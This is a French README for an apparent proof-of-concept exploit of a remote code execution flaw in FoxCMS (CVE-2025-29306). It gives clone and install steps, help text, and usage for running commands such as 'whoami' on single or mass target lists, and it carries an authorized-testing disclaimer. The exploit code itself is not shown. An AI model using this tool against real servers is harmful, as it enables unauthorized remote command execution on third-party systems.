
Preuve de concept (PoC) pour CVE-2025-29306, une vulnérabilité d'exécution de code à distance dans FoxCMS. Ce script Python analyse une ou plusieurs cibles, exécute des commandes et signale les hôtes vulnérables.
Un exploit Python pour CVE-2025-29306, une vulnérabilité d'exécution de code à distance dans FoxCMS. Cet outil permet de tester des cibles uniques ou de scanner plusieurs hôtes en masse.
git clone https://github.com/mattb709/CVE-2025-29306-PoC-FoxCMS-RCE
.git
cd CVE-2025-29306-PoC-FoxCMS-RCE
pip install -r requirements.txt
requestsbeautifulsoup4argparseInstallez les dépendances avec :
pip install requests beautifulsoup4
usage: foxcms_rce.py [-h] -c COMMAND (-t TARGET | -f TARGETS_FILE)
CVE-2025-29306 Exploit Checker
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Command to execute on vulnerable hosts
-t TARGET, --target TARGET
Single target in the format ip:port
-f TARGETS_FILE, --targets-file TARGETS_FILE
File containing multiple targets, one per line, in the format ip:port
python CVE-2025-29306-PoC -t 192.168.1.100:8080 -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami" > results.txt
Le fichier de cibles doit contenir une cible par ligne au format :
ip:port
Exemple :
192.168.1.100:80
10.10.10.5:443
172.16.32.15:8080
Le script fournit :
foxcms_rce_results.txt
Cet outil est destiné uniquement à des fins éducatives et de test autorisé. L'auteur n'est pas responsable de tout usage abusif ou dommage causé par ce programme.
Licence MIT - Voir le fichier LICENSE pour plus de détails.